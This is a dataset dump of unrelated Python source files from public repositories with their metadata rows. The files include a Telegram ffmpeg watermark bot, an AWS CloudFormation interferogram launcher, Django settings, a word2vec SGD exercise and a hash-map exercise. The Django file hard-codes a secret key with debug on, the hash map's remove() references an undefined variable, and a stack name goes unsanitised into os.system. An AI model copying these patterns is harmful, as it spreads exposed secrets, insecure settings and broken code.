y = j["y_coordinates"].replace("[","").replace("]","").split(",")
#LB, LT, RT, RB = (c[0]["x"], c[0]["y"]), (c[1]["x"], c[1]["y"]), (c[2]["x"], c[2]["y"]), (c[3]["x"], c[3]["y"])
LB, LT, RT, RB = (int(y[0]), int(x[0])), (int(y[1]), int(x[1])), (int(y[2]), int(x[2])), (int(y[3]), int(x[3]))
d.line([LB, LT, RT, RB, LB], pen) #red line
im.save(imagePath + "ocred_" + imageName)
print("image saved")
def detectTextBoxOnImage():
"""
detect the textbox on a policy
"""
pass
|
[
"shnnagai@gmail.com"
] |
shnnagai@gmail.com
|
b1f831dc5b99ada2504bfeae16902b81d431db0e
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03470/s172972650.py
|
57f94dcf85afe314754def063304ba328d8d9803
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 140 |
py
|
N = int(input())
d = sorted([int(input()) for i in range(N)])
ans = 1
for i in range(N-1):
if d[i] < d[i+1]:
ans += 1
print(ans)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
8b52b027b34e1dcf92be1fa08afa21d1099e7062
|
3dae023e2da2117755a6caa6476e0279a3f3573b
|
/q3_sgd.py
|
1bba51c77ebf3bb9cdc61e548b5e18e85d63395a
|
[] |
no_license
|
saifkheraj/Word2Vec-CS224D
|
86f222e3daf7dffb193ee168944cb25c847ba794
|
115855d218aa86cb4503ad57ebe71c1db0e394ab
|
refs/heads/master
| 2020-03-26T07:04:06.062565 | 2018-08-15T07:31:28 | 2018-08-15T07:31:28 | 144,635,082 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,147 |
py
|
# Save parameters every a few SGD iterations as fail-safe
SAVE_PARAMS_EVERY = 1000
import glob
import random
import numpy as np
import os.path as op
import cPickle as pickle
def load_saved_params():
""" A helper function that loads previously saved parameters and resets iteration start """
st = 0
for f in glob.glob("saved_params_*.npy"):
iter = int(op.splitext(op.basename(f))[0].split("_")[2])
if (iter > st):
st = iter
if st > 0:
with open("saved_params_%d.npy" % st, "r") as f:
params = pickle.load(f)
state = pickle.load(f)
return st, params, state
else:
return st, None, None
def save_params(iter, params):
with open("saved_params_%d.npy" % iter, "w") as f:
pickle.dump(params, f)
pickle.dump(random.getstate(), f)
def sgd(f, x0, step, iterations, postprocessing = None, useSaved = False, PRINT_EVERY=10):
""" Stochastic Gradient Descent """
# Implement the stochastic gradient descent method in this
# function.
# Inputs:
# - f: the function to optimize, it should take a single
# argument and yield two outputs, a cost and the gradient
# with respect to the arguments
# - x0: the initial point to start SGD from
# - step: the step size for SGD
# - iterations: total iterations to run SGD for
# - postprocessing: postprocessing function for the parameters
# if necessary. In the case of word2vec we will need to
# normalize the word vectors to have unit length.
# - PRINT_EVERY: specifies every how many iterations to output
# Output:
# - x: the parameter value after SGD finishes
# Anneal learning rate every several iterations
ANNEAL_EVERY = 20000
if useSaved:
start_iter, oldx, state = load_saved_params()
if start_iter > 0:
x0 = oldx;
step *= 0.5 ** (start_iter / ANNEAL_EVERY)
if state:
random.setstate(state)
else:
start_iter = 0
x = x0
if not postprocessing:
postprocessing = lambda x: x
expcost = None
for iter in xrange(start_iter + 1, iterations + 1):
### Don't forget to apply the postprocessing after every iteration!
### You might want to print the progress every few iterations.
### YOUR CODE HERE
cost,derivative=f(x)
x=x-(step*derivative)
x=postprocessing(x)
### END YOUR CODE
if iter % PRINT_EVERY == 0:
if not expcost:
expcost = cost
else:
expcost = .95 * expcost + .05 * cost
print "iter %d: %f" % (iter, expcost)
if iter % SAVE_PARAMS_EVERY == 0 and useSaved:
save_params(iter, x)
if iter % ANNEAL_EVERY == 0:
step *= 0.5
return x
def sanity_check():
quad = lambda x: (np.sum(x ** 2), x * 2)
print "Running sanity checks..."
t1 = sgd(quad, 0.5, 0.01, 1000, PRINT_EVERY=100)
print "test 1 result:", t1
assert abs(t1) <= 1e-6
t2 = sgd(quad, 0.0, 0.01, 1000, PRINT_EVERY=100)
print "test 2 result:", t2
assert abs(t2) <= 1e-6
t3 = sgd(quad, -1.5, 0.01, 1000, PRINT_EVERY=100)
print "test 3 result:", t3
assert abs(t3) <= 1e-6
print ""
def your_sanity_checks():
"""
Use this space add any additional sanity checks by running:
python q3_sgd.py
This function will not be called by the autograder, nor will
your additional tests be graded.
"""
print "Running your sanity checks..."
### YOUR CODE HERE
#raise NotImplementedError
### END YOUR CODE
if __name__ == "__main__":
sanity_check();
your_sanity_checks();
|
[
"saifalikheraj@hotmail.com"
] |
saifalikheraj@hotmail.com
|
ebb1b965bd494a3d707ed357c8ce08c6929310db
|
19d16656659d625d30bfccced5d51826772f5435
|
/DataSc/env/bin/jupyter-nbextension
|
96db8eb69e567d87cde671a4a9cf7b4afceff74a
|
[] |
no_license
|
mannann/minacs50
|
5c76d9d0393d070a6a46da667a3de16829757ca5
|
14cbe1a7de1623696acd10eaf101752065755f7a
|
refs/heads/master
| 2020-05-20T18:25:11.894824 | 2019-05-09T03:18:16 | 2019-05-09T03:18:16 | 185,703,311 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 252 |
#!/home/ubuntu/workspace/DataSc/env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from notebook.nbextensions import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"ubuntu@6cea0f54ee0b"
] |
ubuntu@6cea0f54ee0b
|
|
88dacaa17e2b271dcad8fc79b31696d64d78931d
|
f49a4da9605020b09b38d342c305732002cbcdcd
|
/core/ffmpeg.py
|
26e7d025894b999ac830175257f44b4eb6c25226
|
[
"MIT"
] |
permissive
|
hbhammaddyar0/TG-Watermark-bot
|
334fd245910eb1e329d61b2bdffcb7686f83b373
|
c98a249f6789131777cfb76d0123f1744dc354ad
|
refs/heads/main
| 2023-06-07T15:38:37.907890 | 2021-06-17T06:29:46 | 2021-06-17T06:29:46 | 377,711,167 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,926 |
py
|
# (c) @hbhammaddyar
# This is Telegram Video Watermark Adder Bot's Source Code.
# I Hardly Made This. So Don't Forget to Give Me Credits.
# Done this Huge Task for Free. If you guys not support me,
# I will stop making such things!
# Edit anything at your own risk!
# Don't forget to help me if I done any mistake in the codes.
# Support Group: @kdramashindi
# Bots Channel: @hbhammaddyar0
import os
import math
import re
import json
import subprocess
import time
import shlex
import asyncio
from configs import Config
from typing import Tuple
from humanfriendly import format_timespan
from core.display_progress import TimeFormatter
from pyrogram.errors.exceptions.flood_420 import FloodWait
async def vidmark(the_media, message, working_dir, watermark_path, output_vid, total_time, logs_msg, status, mode, position, size):
file_genertor_command = [
"ffmpeg",
"-hide_banner",
"-loglevel",
"quiet",
"-progress",
working_dir,
"-i",
the_media,
"-i",
watermark_path,
"-filter_complex",
f"[1][0]scale2ref=w='iw*{size}/100':h='ow/mdar'[wm][vid];[vid][wm]overlay={position}",
"-c:v",
"h264",
"-preset",
mode,
"-tune",
"film",
"-c:a",
"copy",
output_vid
]
COMPRESSION_START_TIME = time.time()
process = await asyncio.create_subprocess_exec(
*file_genertor_command,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
with open(status, 'r+') as f:
statusMsg = json.load(f)
statusMsg['pid'] = process.pid
f.seek(0)
json.dump(statusMsg, f, indent=2)
while process.returncode != 0:
await asyncio.sleep(5)
with open(working_dir, 'r+') as file:
text = file.read()
frame = re.findall("frame=(\d+)", text)
time_in_us=re.findall("out_time_ms=(\d+)", text)
progress=re.findall("progress=(\w+)", text)
speed=re.findall("speed=(\d+\.?\d*)", text)
if len(frame):
frame = int(frame[-1])
else:
frame = 1;
if len(speed):
speed = speed[-1]
else:
speed = 1;
if len(time_in_us):
time_in_us = time_in_us[-1]
else:
time_in_us = 1;
if len(progress):
if progress[-1] == "end":
break
execution_time = TimeFormatter((time.time() - COMPRESSION_START_TIME)*1000)
elapsed_time = int(time_in_us)/1000000
difference = math.floor( (total_time - elapsed_time) / float(speed) )
ETA = "-"
if difference > 0:
ETA = TimeFormatter(difference*1000)
percentage = math.floor(elapsed_time * 100 / total_time)
progress_str = "📊 **Progress:** {0}%\n`[{1}{2}]`".format(
round(percentage, 2),
''.join(["▓" for i in range(math.floor(percentage / 10))]),
''.join(["░" for i in range(10 - math.floor(percentage / 10))])
)
stats = f'📦️ **Adding Watermark [Preset: `{mode}`]**\n\n' \
f'⏰️ **ETA:** `{ETA}`\n❇️ **Position:** `{position}`\n🔰 **PID:** `{process.pid}`\n🔄 **Duration: `{format_timespan(total_time)}`**\n\n' \
f'{progress_str}\n'
try:
await logs_msg.edit(text=stats)
await message.edit(text=stats)
except FloodWait as e:
await asyncio.sleep(e.x)
pass
except:
pass
stdout, stderr = await process.communicate()
e_response = stderr.decode().strip()
t_response = stdout.decode().strip()
print(e_response)
print(t_response)
if os.path.lexists(output_vid):
return output_vid
else:
return None
async def take_screen_shot(video_file, output_directory, ttl):
# https://stackoverflow.com/a/13891070/4723940
out_put_file_name = output_directory + \
"/" + str(time.time()) + ".jpg"
file_genertor_command = [
"ffmpeg",
"-ss",
str(ttl),
"-i",
video_file,
"-vframes",
"1",
out_put_file_name
]
# width = "90"
process = await asyncio.create_subprocess_exec(
*file_genertor_command,
# stdout must a pipe to be accessible as process.stdout
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
# Wait for the subprocess to finish
stdout, stderr = await process.communicate()
e_response = stderr.decode().strip()
t_response = stdout.decode().strip()
if os.path.lexists(out_put_file_name):
return out_put_file_name
else:
return None
|
[
"noreply@github.com"
] |
hbhammaddyar0.noreply@github.com
|
608f07046d35b8cdb5eff5795a164e522ef0ea84
|
e81fa4692ef5a170aa597c814d648d500d1913fe
|
/bin/proc_ifg_cfn_exp.py
|
4b7bebd0e6856b14f84c601ea5e368d484261df8
|
[
"MIT"
] |
permissive
|
wayne128/dinoSARaws
|
dc905c1ea591831c6c07a432352a51182d3c83d0
|
2b1bd017dfc0059817e22d739392c1ed6cc8d77a
|
refs/heads/master
| 2020-06-12T02:26:47.243620 | 2018-12-17T01:21:47 | 2018-12-17T01:21:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,412 |
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
EXPERIMENTING WITH NEW CLOUD FORMATION SETTINGS
- send email when process begins and completes
- run interferogram using spot market
Note: intended for single interferogram processing. For batch processing
figure out how to store common data and DEM on an EFS drive
# EXAMPLE:
proc_ifg_cfn.py -i c4.4xlarge -p 115 -m 20170927 -s 20170915 -n 2 -r 44.0 44.5 -122.0 -121.5 -g 44.0 44.5 -122.0 -121.5
c4.4xlarge
# Archived Files:
*xml *log
#filt_topophase.unw* filt_topophase.flat* dem.crop* los.rdr.geo* phsig.cor.geo*
# For now just stash entire meged directory
Created on Sun Nov 19 16:26:27 2017
@author: scott
"""
import argparse
import os
def cmdLineParse():
'''
Command line parser.
'''
parser = argparse.ArgumentParser( description='prepare ISCE 2.1 topsApp.py')
parser.add_argument('-m', type=str, dest='master', required=True,
help='Master date')
parser.add_argument('-s', type=str, dest='slave', required=True,
help='Slave date')
parser.add_argument('-p', type=int, dest='path', required=True,
help='Path/Track/RelativeOrbit Number')
parser.add_argument('-i', type=str, dest='instance', required=False, default='t2.micro',
help='EC2 instance type (c4.4xlarge, t2.micro...)')
parser.add_argument('-n', type=int, nargs='+', dest='swaths', required=False,
default=[1,2,3], choices=(1,2,3),
help='Subswath numbers to process')
parser.add_argument('-r', type=float, nargs=4, dest='roi', required=False,
metavar=('S','N','W','E'),
help='Region of interest bbox [S,N,W,E]')
parser.add_argument('-g', type=float, nargs=4, dest='gbox', required=False,
metavar=('S','N','W','E'),
help='Geocode bbox [S,N,W,E]')
return parser.parse_args()
def create_cloudformation_script(inps):
'''
Write YML file to process and interferogram based on user input
NOTE: could probably do this better w/ JSON tools...
'''
filename = 'proc-{master}-{slave}.yml'.format(**vars(inps))
with open(filename, 'w') as yml:
yml.write('''AWSTemplateFormatVersion: "2010-09-09"
Description: "CloudFormation template to create interferogram: int-{master}-{slave}"
Resources:
MyEC2Instance:
Type: "AWS::EC2::Instance"
Properties:
ImageId: "ami-8deb36f5"
InstanceType: "{instance}"
KeyName: "isce-key"
SecurityGroups: ["isce-sg",]
BlockDeviceMappings:
-
DeviceName: /dev/sda1
Ebs:
VolumeType: gp2
VolumeSize: 8
DeleteOnTermination: true
-
DeviceName: /dev/xvdf
Ebs:
VolumeType: gp2
VolumeSize: 100
DeleteOnTermination: true
UserData:
'Fn::Base64': !Sub |
#!/bin/bash
# add -xe to above line for debugging output to /var/log/cloud-init-output.log
# create mount point directory NOTE all commands run as root
#mkdir /mnt/data
# create ext4 filesystem on new volume
mkfs -t ext4 /dev/xvdf
# add an entry to fstab to mount volume during boot
echo "/dev/xvdf /mnt/data ext4 defaults,nofail 0 2" >> /etc/fstab
# mount the volume on current boot
mount -a
chown -R ubuntu /mnt/data
sudo -i -u ubuntu bash <<"EOF"
export PATH="/home/ubuntu/miniconda3/envs/isce-2.1.0/bin:/home/ubuntu/.local/bin:$PATH"
export GDAL_DATA=/home/ubuntu/miniconda3/envs/isce-2.1.0/share/gdal
source /home/ubuntu/ISCECONFIG
# Make directories for processing - already in AMI
cd /mnt/data
mkdir dems poeorb auxcal
# Get the latest python scripts from github & add to path
git clone https://github.com/scottyhq/dinoSAR.git
export PATH=/mnt/data/dinoSAR/bin:$PATH
echo $PATH
# Download inventory file
get_inventory_asf.py -r {roi}
# Prepare interferogram directory
prep_topsApp.py -i query.geojson -p {path} -m {master} -s {slave} -n {swaths} -r {roi} -g {gbox}
# Run code
cd int-{master}-{slave}
topsApp.py 2>&1 | tee topsApp.log
# Create S3 bucket and save results
aws s3 mb s3://int-{master}-{slave}
cp *xml *log merged
aws s3 sync merged/ s3://int-{master}-{slave}/
# Close instance
EOF
echo "Finished interferogram... shutting down"
#shutdown #doesn't close entire stack
aws cloudformation delete-stack --stack-name proc-{master}-{slave}
'''.format(**vars(inps)))
return filename
def launch_stack(template):
'''
launch AWS CloudFormationStack
'''
name = template[:-4]
cmd = 'aws cloudformation create-stack --stack-name {0} --template-body file://{1}'.format(name,template)
print(cmd)
os.system(cmd)
if __name__ == '__main__':
inps = cmdLineParse()
inps.roi = ' '.join([str(x) for x in inps.roi])
inps.gbox = ' '.join([str(x) for x in inps.gbox])
inps.swaths = ' '.join([str(x) for x in inps.swaths])
template = create_cloudformation_script(inps)
print('Running Interferogram on EC2')
launch_stack(template)
print('EC2 should close automatically when finished...')
|
[
"scottyhq@gmail.com"
] |
scottyhq@gmail.com
|
dec6c0c42f0bad8ce00df0e0e3289617fbecf922
|
e06161af1bafac937d3479d9f21bb58a25c571cb
|
/2d_array_take2.py
|
fad226c927eb34864e66927113a552d261d115a2
|
[] |
no_license
|
mdayunus/dsa-in-py
|
641a4a1728fdb8b7c7aa70152a34922a64b7c096
|
6776e9927e85c0a81091190f3f2d0fa12d74a767
|
refs/heads/master
| 2023-04-17T08:32:40.259202 | 2021-05-07T22:42:52 | 2021-05-07T22:42:52 | 364,181,378 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 486 |
py
|
def simple(a):
maxi = 0
for i in range(1,5):
for j in range(1,5):
insum = a[i-1][j-1]+a[i-1][j]+a[i-1][j+1]+a[i][j]+a[i+1][j-1]+a[i+1][j]+a[i+1][j+1]
if insum > maxi:
maxi = insum
return maxi
if __name__ == '__main__':
a = [
[1, 1, 1, 0, 0, 0],
[0, 1, 0, 0, 0, 0],
[1, 1, 1, 0, 0, 0],
[0, 0, 2, 4, 4, 0],
[0, 0, 0, 2, 0, 0],
[0, 0, 1, 2, 4, 0],
]
print(simple(a))
|
[
"mdayunus@gmail.com"
] |
mdayunus@gmail.com
|
bb2ddd0cc7eed6fb5c05708a37f3d838e9e6a58d
|
a5901321e965a12ed476899e69e5793b007f32b1
|
/tristan-TristanD/week-8/flask-intro/.env/bin/pip
|
1edc68b36e2942b1b903f0e8ea8863e553709615
|
[] |
no_license
|
trrstnn/sf-wdi-51-assignments
|
4161483fd3aa8f81d63bf3503163b701bcee559d
|
6ea3057e683a1c5c87230afd08efad73957f7bd8
|
refs/heads/master
| 2020-04-18T04:35:36.605552 | 2019-03-22T05:03:22 | 2019-03-22T05:03:22 | 167,245,007 | 0 | 0 | null | 2019-01-23T19:56:49 | 2019-01-23T19:56:48 | null |
UTF-8
|
Python
| false | false | 272 |
#!/Users/trizzy/Desktop/wdi/exercises/week-8/flask-intro/.env/bin/python3.7
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"edeclarin@gmail.com"
] |
edeclarin@gmail.com
|
|
be170dcc3bdd5793fcc52084d7dd6184d1ea3928
|
51aa2894c317f60726fe9a778999eb7851b6be3e
|
/120_design_patterns/014_command/_exercises/templates/4-Command Pattern/Assignment/Solution/security_commands.py
|
dccb3920efff4cf8a244e3bb8df5cf9715871ec1
|
[] |
no_license
|
pranaymate/Python_Topics
|
dd7b288ab0f5bbee71d57080179d6481aae17304
|
33d29e0a5bf4cde104f9c7f0693cf9897f3f2101
|
refs/heads/master
| 2022-04-25T19:04:31.337737 | 2020-04-26T00:36:03 | 2020-04-26T00:36:03 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 455 |
py
|
# ____ a__.s... ______ S..
# ____ c_a.. ______ AC..
#
#
# c_ SecurityArmCommand AC..
# ___ - security
# __ no. isi.. ? S..
# r_ T..
# ? ?
#
# ___ execute
# s____.a..
#
# ___ undo(
# s___.di..
#
#
# c_ SecurityDisarmCommand(AbsCommand):
# ___ - security
# __ no. isi.. ? S..
# r_ T..
# ? ?
#
# ___ execute
# s___.di..
#
# ___ undo
# s___.a..
|
[
"sergejyurskyj@yahoo.com"
] |
sergejyurskyj@yahoo.com
|
76b7b7fd8b8e98790d7b81290bc4cc77bea998c9
|
a74a592d3e34c0cb2e19363a92410c520dc0ecda
|
/backend/course/models.py
|
1ed6ffe755403a8dcb6cbf4e3dc54d87f002688f
|
[] |
no_license
|
crowdbotics-apps/youthbuild-course-a-18675
|
5e4f0231b6127b215576c87593b8a073518200de
|
4f17bfa2f588be23f24d862ca86fba569908e90e
|
refs/heads/master
| 2022-11-08T20:55:36.094513 | 2020-07-07T19:33:25 | 2020-07-07T19:33:25 | 277,903,947 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,850 |
py
|
from django.conf import settings
from django.db import models
class Course(models.Model):
"Generated Model"
author = models.ForeignKey(
"users.User", on_delete=models.CASCADE, related_name="course_author",
)
title = models.CharField(null=True, blank=True, max_length=256,)
description = models.TextField(null=True, blank=True,)
categories = models.ManyToManyField(
"course.Category", blank=True, related_name="course_categories",
)
class Lesson(models.Model):
"Generated Model"
module = models.ForeignKey(
"course.Module", on_delete=models.CASCADE, related_name="lesson_module",
)
title = models.CharField(max_length=256,)
description = models.TextField()
media = models.URLField()
class Category(models.Model):
"Generated Model"
name = models.CharField(max_length=256,)
class Enrollment(models.Model):
"Generated Model"
user = models.ForeignKey(
"users.User", on_delete=models.CASCADE, related_name="enrollment_user",
)
course = models.ForeignKey(
"course.Course", on_delete=models.CASCADE, related_name="enrollment_course",
)
class Event(models.Model):
"Generated Model"
name = models.CharField(max_length=256,)
user = models.ForeignKey(
"users.User", on_delete=models.CASCADE, related_name="event_user",
)
date = models.DateTimeField()
class Module(models.Model):
"Generated Model"
course = models.ForeignKey(
"course.Course", on_delete=models.CASCADE, related_name="module_course",
)
title = models.CharField(max_length=256,)
description = models.TextField()
class SubscriptionType(models.Model):
"Generated Model"
name = models.CharField(max_length=256,)
class Recording(models.Model):
"Generated Model"
event = models.ForeignKey(
"course.Event", on_delete=models.CASCADE, related_name="recording_event",
)
media = models.URLField()
user = models.ForeignKey(
"users.User", on_delete=models.CASCADE, related_name="recording_user",
)
published = models.DateTimeField()
class Group(models.Model):
"Generated Model"
name = models.CharField(max_length=256,)
class Subscription(models.Model):
"Generated Model"
subscription_type = models.ForeignKey(
"course.SubscriptionType",
on_delete=models.CASCADE,
related_name="subscription_subscription_type",
)
user = models.ForeignKey(
"users.User", on_delete=models.CASCADE, related_name="subscription_user",
)
class PaymentMethod(models.Model):
"Generated Model"
user = models.ForeignKey(
"users.User", on_delete=models.CASCADE, related_name="paymentmethod_user",
)
primary = models.BooleanField()
token = models.CharField(max_length=256,)
# Create your models here.
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
19d3b612fa87b5b0dcdf3f23ddece88b33ff1990
|
6f496bd9095d232002440401655535c77def0d97
|
/problem1.py
|
94a522f3c16b4ec8cdc399a0c12ede621546ef98
|
[] |
no_license
|
kartavyabhatts30/Design-1
|
357aa23a8be518a331037bd651dde76412262597
|
0677c410142a130263f7865a1ed5cd52290dfd39
|
refs/heads/master
| 2022-11-22T04:40:59.934246 | 2020-07-22T04:46:46 | 2020-07-22T04:46:46 | 277,712,921 | 0 | 0 | null | 2020-07-07T04:04:58 | 2020-07-07T04:04:57 | null |
UTF-8
|
Python
| false | false | 2,040 |
py
|
# Time Complexity :
# Space Complexity :
# Did this code successfully run on Leetcode :
# Any problem you faced while coding this :
# Your code here along with comments explaining your approach
class linkedListNode:
def __init__(self, k, v):
self.key = k
self.value = v
self.next = None
class MyHashMap:
def __init__(self):
"""
Initialize your data structure here.
"""
self.hashMap = [None for _ in range(1000)]
def put(self, key: int, value: int) -> None:
"""
value will always be non-negative.
"""
hIndex = key//1000
if self.hashMap[hIndex] is None:
self.hashMap[hIndex] = linkedListNode(key, value)
else:
curr = self.hashMap[hIndex]
while curr.next is not None:
curr = curr.next
curr.next = linkedListNode(key, value)
def get(self, key: int) -> int:
"""
Returns the value to which the specified key is mapped, or -1 if this map contains no mapping for the key
"""
hIndex = key//1000
curr = self.getPrev(self.hashMap[hIndex], key)
if curr.next is None:
return -1
else:
return curr.next.value
def remove(self, key: int) -> None:
"""
Removes the mapping of the specified value key if this map contains a mapping for the key
"""
curr = self.getPrev(self.hashMap[hIndex], key)
if curr.next is not None:
curr.next = curr.next.next
def getPrev(self, node, key):
prev = None
while node.key != key and node.next is not None:
prev = node
node = node.next
return prev
# Your MyHashMap object will be instantiated and called as such:
key, value = 10023, 65461
obj = MyHashMap()
obj.put(key,value)
param_2 = obj.get(key)
print(param_2)
obj.remove(key)
|
[
"bkartavya07@gmail.com"
] |
bkartavya07@gmail.com
|
d45bc129e292a1e9f115213dcfce753bb1df6867
|
cfce575e6eb1bed6ba4cfcc457f32c396d62f2fc
|
/settings.py
|
fa55a701de2fc0a0d12d69742b2a1dca4ccd6585
|
[] |
no_license
|
Bligh-Park/mysite
|
3edf7f18dc85e5418b3b3ad5c2212101658e44b1
|
7c21ff9b81aa03dd64f3d57357280e69a21fe97c
|
refs/heads/master
| 2021-01-20T06:42:42.209083 | 2017-05-01T07:51:08 | 2017-05-01T07:51:08 | 89,910,962 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,331 |
py
|
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.11.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'bpe@xbij_g9s*v#xz_7)%3b%s1e_z0$p!w+8tqd64r84mlw$o&'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'bookmark.apps.BookmarkConfig',
'blog.apps.BlogConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Seoul'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [os.path.join(BASE_DIR, 'static')]
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
|
[
"sy131.park@gmail.com"
] |
sy131.park@gmail.com
|
a3b0628f021f81f748f640274f9ddface28f23ea
|
500b03fa6cb776c1d51db4a3a3aa252ddf5a50e6
|
/book_exercise/py_intro/basics/Chapter 4: If statement/num_close.py
|
d5a70064327dbf0d92c9c632d600f35af5edadad
|
[] |
no_license
|
carloslvm/learning-python
|
b3796a0a5b751baae8c551a9f6fe262f98980691
|
07f885454cf21b7d215a58da7fcb907715e546bd
|
refs/heads/master
| 2022-07-27T21:39:11.937801 | 2022-07-09T17:47:56 | 2022-07-09T17:47:56 | 163,447,616 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 364 |
py
|
#!/usr/bin/python3
# Guessing a float number
num = 10.000
user_num = float(input('Try to guess the float number: '))
if user_num == 10.001 or user_num == 9.999:
print('You were close.')
elif user_num != 10.001 and user_num != 9.999:
print('You were not close.')
elif user_num == num:
print('That\'s correct.')
else:
print('You were no close.')
|
[
"cvaldez553@gmail.com"
] |
cvaldez553@gmail.com
|
c295ac822210fac2e47f1c17e39c91b6cf211895
|
63b833d7f84cfea52f5f897c8f6419096b38d9c6
|
/LOF_iF_test.py
|
d6fd144e269a931c2ad9e3dee6918d4dd07221df
|
[] |
no_license
|
jywang2016/Modelica-related-code
|
f1be6bf9b3b33145cd4d4cba5093c0a9b424f9d3
|
3098383c121b80bfe7715020eb045e85edb030f0
|
refs/heads/master
| 2022-03-15T06:58:53.342384 | 2019-10-28T21:28:48 | 2019-10-28T21:28:48 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,654 |
py
|
## General imports
import numpy as np
import pandas as pd
import os,inspect
import math
# Get this current script file's directory:
loc = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
# Set working directory
os.chdir(loc)
os.chdir('..') # parent directory
from myFunctions import gen_FTN_data
from meSAX import *
os.chdir(loc) # change back to loc
# from dtw_featurespace import *
# from dtw import dtw
# from fastdtw import fastdtw
# to avoid tk crash
import matplotlib
matplotlib.use('Qt5Agg')
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
## generate data
# set random seed
np.random.seed(0)
# my sample data
x_mean1 = 0
y_mean1 = 0
x_mean2 = 45
y_mean2 = 13
x_mean3 = 7
y_mean3 = 40
N1 = 100
N2 = 100
N3 = 100
# coords1 = np.random.uniform(0,12,(N1,2))
# coords2 = np.random.uniform(0,5,(N2,2))
coords1 = np.random.randn(N1,2) * 16
coords2 = np.random.randn(N2,2) * 4
coords3 = np.random.randn(N3,2) * 1
outliers = np.array([15,15,23,12]).reshape(2,2)
coords = np.empty((N1+N2+N3+outliers.shape[0],2))
coords[:N1] = coords1 + (x_mean1,y_mean1)
coords[N1:(N1+N2)] = coords2 + (x_mean2,y_mean2)
coords[(N1+N2):-2] = coords3 + (x_mean3,y_mean3)
coords[-2:] = outliers
# # sklearn example data
# n_points_per_cluster = 250
#
# C1 = [-5, -2] + .8 * np.random.randn(n_points_per_cluster, 2)
# C2 = [4, -1] + .1 * np.random.randn(n_points_per_cluster, 2)
# C3 = [1, -2] + .2 * np.random.randn(n_points_per_cluster, 2)
# C4 = [-2, 3] + .3 * np.random.randn(n_points_per_cluster, 2)
